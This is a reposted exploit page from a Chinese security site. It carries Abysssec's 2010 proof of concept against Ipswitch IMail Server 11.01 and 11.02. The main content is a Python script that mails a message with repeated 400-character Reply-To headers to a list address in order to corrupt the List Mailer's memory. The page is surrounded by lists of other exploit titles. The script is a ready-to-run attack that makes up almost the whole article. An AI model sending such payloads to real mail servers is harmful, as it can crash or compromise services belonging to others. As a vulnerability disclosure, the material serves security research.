首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Ipswitch Imail Server List Mailer Reply-To Address Memory Corruption
来源:http://www.abysssec.com 作者:Abysssec 发布时间:2010-09-16  

'''
  __  __  ____         _    _ ____ 
 |  \/  |/ __ \   /\  | |  | |  _ \
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ <
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/

http://www.exploit-db.com/moaub-15-ipswitch-imail-server-list-mailer-reply-to-address-memory-corruption/

'''

'''
  Title               :  Ipswitch Imail Server List Mailer Reply-To Address memory corruption
  Version             :  Imail server v11.01 and 11.02
  Analysis            :  http://www.abysssec.com
  Vendor              :  http://www.ipswitch.com
  Impact              :  Critical
  Contact             :  shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter             :  @abysssec

'''

import smtplib

sender = 'from@fromdomain.com'
receivers = ['CrashList@wapteam-f556693']

message = """From: From Person <from@fromdomain.com>
To: To Person <CrashList@wapteam-f556693>
"""
#ReplayCount = 5
#while ReplayCount>0:
#   message = message + "Reply-To:"
counter = 3
while counter>0:
#   if counter != 50000 :
#      message = message + ","
   #message = message + "Reply-To: <someone"+str(counter)+"@example.org>"
   message = message + "Reply-To: "+("A"*200)+"a"*4+"B"*196+"@exam.com"
   counter = counter - 1
   message = message + "\n"
#   ReplayCount = ReplayCount - 1
  
#message = message + "\n"
message = message + """
Subject: SMTP e-mail test

This is a test e-mail message.

"""
#print message 
#fp = open("C:\\Program Files\\Ipswitch\\IMail\\spool\\tmp188.tmp","w")
#fp.write(message)
#fp.close()
#print "wrote"
try:
   smtpObj = smtplib.SMTP('localhost')
   smtpObj.sendmail(sender, receivers, message)        
   print "Successfully sent email"
except SMTPException:
   print "Error: unable to send email"


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·win32/xp sp3 (Tr) MessageBoxA
·MP3 Workstation Version 9.2.1.
·plano mostracategoria (id) Rem
·Integard Pro 2.2.0.9026 (Win7
·NCP Secure Entry Client v.9.23
·win32/xp sp3 (Tr) cmd.exe Shel
·NCP Secure Client - Juniper Ed
·win32/xp sp3 (Tr) Create New F
·IBM Lotus Domino iCalendar Ema
·win32/xp sp3 (Tr) calc.exe She
·E-Xoopport - Samsara <= v3.1 (
·vBulletin vbseo.php本地文件包
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved